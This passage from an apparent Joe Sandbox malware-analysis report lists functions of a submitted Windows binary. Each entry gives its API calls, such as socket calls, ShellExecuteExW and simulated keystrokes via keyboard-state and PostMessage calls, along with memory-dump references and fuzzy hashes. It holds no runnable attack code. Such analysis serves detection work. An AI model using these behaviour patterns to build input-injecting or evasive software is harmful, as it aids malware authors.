                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                  • String ID:
                                                                  • API String ID: 1211466189-0
                                                                  • Opcode ID: 1bd793ccd8822ad3e3015d62b4cadfce609a17e66632862f475e0a0cc00d27f9
                                                                  • Instruction ID: 999f9f05bd4069718afe48002c9ad407cc1a1b14fd32fbb13ef6ecff6a645b9c
                                                                  • Opcode Fuzzy Hash: 1bd793ccd8822ad3e3015d62b4cadfce609a17e66632862f475e0a0cc00d27f9
                                                                  • Instruction Fuzzy Hash: 2CB19B72601219EBDF18CF68C9C57AD7BB5BF04711F08C169EC4C9B299D734A990CB90
                                                                  Function 008F2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0092C1C7,00000004,00000000,00000000,00000000), ref: 008F2ACF
                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0092C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 008F2B17
                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0092C1C7,00000004,00000000,00000000,00000000), ref: 0092C21A
                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0092C1C7,00000004,00000000,00000000,00000000), ref: 0092C286
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  • Opcode ID: 037946995fe5cfe9fdaaa4d462acf81c2e1d5bc7aedd30af6d3be4aa0b5086c0
                                                                  • Instruction ID: cffa93760cdb3efe30734f1ed0a51dae54a2be0c3ae73bb15dbe4b3d57e3e5fc
                                                                  • Opcode Fuzzy Hash: 037946995fe5cfe9fdaaa4d462acf81c2e1d5bc7aedd30af6d3be4aa0b5086c0
                                                                  • Instruction Fuzzy Hash: 0D412631218A9CDAC7398B399C9CB7F7B96FB85314F24881DE25BD2560CA35E881E711
                                                                  Function 009570C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 009570DD
                                                                    • Part of subcall function 00910DB6: std::exception::exception.LIBCMT ref: 00910DEC
                                                                    • Part of subcall function 00910DB6: __CxxThrowException@8.LIBCMT ref: 00910E01
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00957114
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00957130
                                                                  • _memmove.LIBCMT ref: 0095717E
                                                                  • _memmove.LIBCMT ref: 0095719B
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 009571AA
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009571BF
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 009571DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 256516436-0
                                                                  • Opcode ID: 38149af8cfaad502024ca37d5f9b8dac353736d6fd0866264210d112d51f72d0
                                                                  • Instruction ID: c6a5e175fdd223e2b162f2f64352b7410baed5d1eda70be524e7724ce2e75036
                                                                  • Opcode Fuzzy Hash: 38149af8cfaad502024ca37d5f9b8dac353736d6fd0866264210d112d51f72d0
                                                                  • Instruction Fuzzy Hash: 21319332A04205EBCB00DFA5DC85AAEB778FF85710F1440A5FD08AB246D7709E94DB60
                                                                  Function 009761D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 009761EB
                                                                  • GetDC.USER32(00000000), ref: 009761F3
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009761FE
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0097620A
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00976246
                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00976257
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0097902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00976291
                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009762B1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 3864802216-0
                                                                  • Opcode ID: 16d0e43f3e3d73679de5650b47894d0a1826eaae865f8775ad16ec8a000c04bf
                                                                  • Instruction ID: 6401328b65b9780f4a9427deafa13551977dfdd6d9aba489e0085e603a52d896
                                                                  • Opcode Fuzzy Hash: 16d0e43f3e3d73679de5650b47894d0a1826eaae865f8775ad16ec8a000c04bf
                                                                  • Instruction Fuzzy Hash: 0131AD72215214BFEF108F10CC8AFEA3BADEF49725F044065FE0CEA292D6759881CB60
                                                                  Function 0094BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memcmp
                                                                  • String ID:
                                                                  • API String ID: 2931989736-0
                                                                  • Opcode ID: 1a1f7366855c6b0ed4d4e53eec194ff4b4c6d65bef528b45c9509f0fb08d57e7
                                                                  • Instruction ID: d4238a94ed2d758dce5116a470baccfde18a1ca5a52c76230c6c5366f5a2eb74
                                                                  • Opcode Fuzzy Hash: 1a1f7366855c6b0ed4d4e53eec194ff4b4c6d65bef528b45c9509f0fb08d57e7
                                                                  • Instruction Fuzzy Hash: B621DC7170120A7BE60477259DC2FFB775DEE9178CF084429FE089A683EB68DE1182A1
                                                                  Function 0095EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                    • Part of subcall function 0090FC86: _wcscpy.LIBCMT ref: 0090FCA9
                                                                  • _wcstok.LIBCMT ref: 0095EC94
                                                                  • _wcscpy.LIBCMT ref: 0095ED23
                                                                  • _memset.LIBCMT ref: 0095ED56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                  • String ID: X
                                                                  • API String ID: 774024439-3081909835
                                                                  • Opcode ID: 37162edcaad6721ca3369f5247f6d3b7ade9a6659655ad435e750474796fced6
                                                                  • Instruction ID: aa871fd8b55a6d908f96000811eff88e10b13fc0ad75e4a30f841661e60a13d6
                                                                  • Opcode Fuzzy Hash: 37162edcaad6721ca3369f5247f6d3b7ade9a6659655ad435e750474796fced6
                                                                  • Instruction Fuzzy Hash: CFC16E316083059FD718EF28C855A6AB7E4FF85310F00492DF999DB2A2DB71ED49CB82
                                                                  Function 00966B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00966C00
                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00966C21
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00966C34
                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 00966CEA
                                                                  • inet_ntoa.WSOCK32(?), ref: 00966CA7
                                                                    • Part of subcall function 0094A7E9: _strlen.LIBCMT ref: 0094A7F3
                                                                    • Part of subcall function 0094A7E9: _memmove.LIBCMT ref: 0094A815
                                                                  • _strlen.LIBCMT ref: 00966D44
                                                                  • _memmove.LIBCMT ref: 00966DAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 3619996494-0
                                                                  • Opcode ID: 020ee0eb98f7b4167c170f0c67f9b402c3c62aa41a0a7ffd504bc97a32a9b235
                                                                  • Instruction ID: 7633b5d2547c19fb2b32b2f539a80ed7ced9352e9c44a6e778fbc3ba73ca7aa7
                                                                  • Opcode Fuzzy Hash: 020ee0eb98f7b4167c170f0c67f9b402c3c62aa41a0a7ffd504bc97a32a9b235
                                                                  • Instruction Fuzzy Hash: 0281BE72208204ABD710EB38DC96F7AB7A8EF84714F14491DFA55DB2D2DA70ED05CB92
                                                                  Function 008F1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f8e70f964a16d569837a4d7c057d09293a73f75b86dc6a0234125269647d696b
                                                                  • Instruction ID: 608fb3bbb9234eda1fed210996e6ad788607aefb5e22d9497c9e20f8d6c29773
                                                                  • Opcode Fuzzy Hash: f8e70f964a16d569837a4d7c057d09293a73f75b86dc6a0234125269647d696b
                                                                  • Instruction Fuzzy Hash: 5971493190411DEFCF04DFA8CC89ABEBBB9FF85314F148159FA15AA251C734AA51CBA4
                                                                  Function 0097B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindow.USER32(01394E50), ref: 0097B3EB
                                                                  • IsWindowEnabled.USER32(01394E50), ref: 0097B3F7
                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0097B4DB
                                                                  • SendMessageW.USER32(01394E50,000000B0,?,?), ref: 0097B512
                                                                  • IsDlgButtonChecked.USER32(?,?), ref: 0097B54F
                                                                  • GetWindowLongW.USER32(01394E50,000000EC), ref: 0097B571
                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0097B589
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                  • String ID:
                                                                  • API String ID: 4072528602-0
                                                                  • Opcode ID: c29f84482f9681303e172989ee570eb84b0d5cd7ac30ac22690e389ae47695b3
                                                                  • Instruction ID: f7d3631d125256109e50b25db52ca4d773aaf2c38d0888ecc454473c935db7b2
                                                                  • Opcode Fuzzy Hash: c29f84482f9681303e172989ee570eb84b0d5cd7ac30ac22690e389ae47695b3
                                                                  • Instruction Fuzzy Hash: 4D71AD36605204EFDB219F64C8E4FBA7BB9FF49310F148059FA49972B2D732A980DB50
                                                                  Function 0096F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0096F448
                                                                  • _memset.LIBCMT ref: 0096F511
                                                                  • ShellExecuteExW.SHELL32(?), ref: 0096F556
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                    • Part of subcall function 0090FC86: _wcscpy.LIBCMT ref: 0090FCA9
                                                                  • GetProcessId.KERNEL32(00000000), ref: 0096F5CD
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0096F5FC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                  • String ID: @
                                                                  • API String ID: 3522835683-2766056989
                                                                  • Opcode ID: 091b12ee129088c18e615c79a810001181ab00ade8bd932afdcc7e4111411036
                                                                  • Instruction ID: 88ba2f75ebdf48003c860bb06867918b27375b6e649ea4f74b39b667f52e0e48
                                                                  • Opcode Fuzzy Hash: 091b12ee129088c18e615c79a810001181ab00ade8bd932afdcc7e4111411036
                                                                  • Instruction Fuzzy Hash: D961CF75A00619DFCB04DF68D495AAEBBF5FF48310F108069E85AAB361CB30AD41CF81
                                                                  Function 00950F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00950F8C
                                                                  • GetKeyboardState.USER32(?), ref: 00950FA1
                                                                  • SetKeyboardState.USER32(?), ref: 00951002
                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00951030
                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 0095104F
                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00951095
                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009510B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: 302858817a194e71e8b9b332852d44e9b1b6331c8d3f119bfc43728c56da8237
                                                                  • Instruction ID: 01560d236e2386b6088c05ac4d6953f5225e7de59341febb242f5e5e22d04539
                                                                  • Opcode Fuzzy Hash: 302858817a194e71e8b9b332852d44e9b1b6331c8d3f119bfc43728c56da8237
                                                                  • Instruction Fuzzy Hash: 865124605087D53DFB36D2358C15BBABEAD5B46306F088589E9D4468C3C2D8DCCCD750
                                                                  Function 00950D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(00000000), ref: 00950DA5
                                                                  • GetKeyboardState.USER32(?), ref: 00950DBA
                                                                  • SetKeyboardState.USER32(?), ref: 00950E1B
                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00950E47
                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00950E64
                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00950EA8
                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00950EC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: be9da201c7333c458679bcfc28a487d7b3300631cca0022d5b0e4ef794a8fabd
                                                                  • Instruction ID: a8e70a653ced1b6d18a6301b65f4f08da6ae187f01863b1ae56ce1f9cab1a541
                                                                  • Opcode Fuzzy Hash: be9da201c7333c458679bcfc28a487d7b3300631cca0022d5b0e4ef794a8fabd
                                                                  • Instruction Fuzzy Hash: 5C5118A05087D57DFB32C3368C56BBA7FAD6B86301F188889F9D8564C2C395AC9CD750
                                                                  Function 009555FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsncpy$LocalTime
                                                                  • String ID:
                                                                  • API String ID: 2945705084-0
                                                                  • Opcode ID: cf3fbc76bf6495cd54a8080219ec62f03f6af2d55a6299a659d9fcaf2930c6aa
                                                                  • Instruction ID: 221fa9841b50ff9b80a7a223117c5306bef14d82fbe390a27d50aa9b407758a3
                                                                  • Opcode Fuzzy Hash: cf3fbc76bf6495cd54a8080219ec62f03f6af2d55a6299a659d9fcaf2930c6aa
                                                                  • Instruction Fuzzy Hash: 0D41D565D1061876DB11FBB58C46ACFB3BC9F49310F508956F908E3222FB34A295C7E6
                                                                  Function 00953671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0095466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00953697,?), ref: 0095468B
                                                                    • Part of subcall function 0095466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00953697,?), ref: 009546A4
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 009536B7
                                                                  • _wcscmp.LIBCMT ref: 009536D3
                                                                  • MoveFileW.KERNEL32(?,?), ref: 009536EB
                                                                  • _wcscat.LIBCMT ref: 00953733
                                                                  • SHFileOperationW.SHELL32(?), ref: 0095379F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                  • String ID: \*.*
                                                                  • API String ID: 1377345388-1173974218
                                                                  • Opcode ID: f0f15418c705771cf2df32cd13b3934a3a9e9ab9b8b2841c0abb0f65a4b1d429
                                                                  • Instruction ID: f0b5b7750d2bf8fb22527b914384df3a25d718731f53629f71efbe733fd08875
                                                                  • Opcode Fuzzy Hash: f0f15418c705771cf2df32cd13b3934a3a9e9ab9b8b2841c0abb0f65a4b1d429
                                                                  • Instruction Fuzzy Hash: 10418F71508344AAC752EF65D442ADF77ECAF89380F00482EF899C3251EA34D68DCB52
                                                                  Function 00977291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 009772AA
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00977351
                                                                  • IsMenu.USER32(?), ref: 00977369
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009773B1
                                                                  • DrawMenuBar.USER32 ref: 009773C4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                                  • String ID: 0
                                                                  • API String ID: 3866635326-4108050209
                                                                  • Opcode ID: 8e8e94aa30fa6ae8472353f6edfbd6cb1c4ffb793f7e269d98befe6efac23352
